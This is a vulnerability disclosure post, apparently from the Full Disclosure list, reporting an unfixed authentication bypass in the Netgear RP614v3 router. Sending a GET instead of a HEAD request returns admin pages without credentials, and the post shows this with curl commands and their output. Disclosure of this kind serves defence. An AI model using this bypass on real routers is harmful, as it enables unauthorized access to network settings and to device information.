[FD] Netgear RP614v3 : Authentication Bypass

########################################### Vendor : NETGEAR Product : RP614v3 informed on : 12. 10. 2015 responded : no fixed : no Effect : Remotely exploitable over LAN/WLAN Typ : Authentication Bypass Difficulty : trivial ########################################### The N300 FW authentication bypass inspired me to check my rp614v3 router and I found this bypass: Firmware: *Firmwareversion* V6.0GR Oct 26 2004 ( which seems to be the lastest ) It's an old model, but it's still in operation with ADSL2 connections like TCOM DSL6000 in Germany. How it works: If you use a normal browser, it sends a *HEAD*, followed by a GET, to the router first, which gets a 403 Forbidden back: # curl -I "http://ift.tt/23LDsnp" HTTP/1.0 403 Forbidden this was expected and is the valid answere, but if you send a *GET* instead of the HEAD and your not authenticated, you get the 200 back : # curl -i "http://ift.tt/23LDsnp" HTTP/1.0 200 OK Server: Embedded HTTPD v1.00, 1999(c) Delta Networks Inc. Content-length: 7158 Accept-ranges: bytes Content-type: text/html ... Works for every page, with all informations disclosed the router has to offer. No password nor a username needed. Example : #curl -i "http://ift.tt/1L0X7UM" HTTP/1.0 200 OK Server: Embedded HTTPD v1.00, 1999(c) Delta Networks Inc. Content-length: 13722 Accept-ranges: bytes Content-type: text/html ....

�	#	IP-Adresse	Ger�tename	MAC-Adresse
	1	*192.168.1.2*	LapTop	*00:15:a5:d5:f7:7c*
	2	*192.168.1.3*	Accesspoint	*21:6e:5c:23:86:a2*

(all ips and mac have been changed ) Sidenote: As it's a problem of the underlying httpd server from "Delta Networks Inc." , it's most likely to be effecting all dsl router products using that same version of the httpd.

Source: Gmail -> IFTTT-> Blogger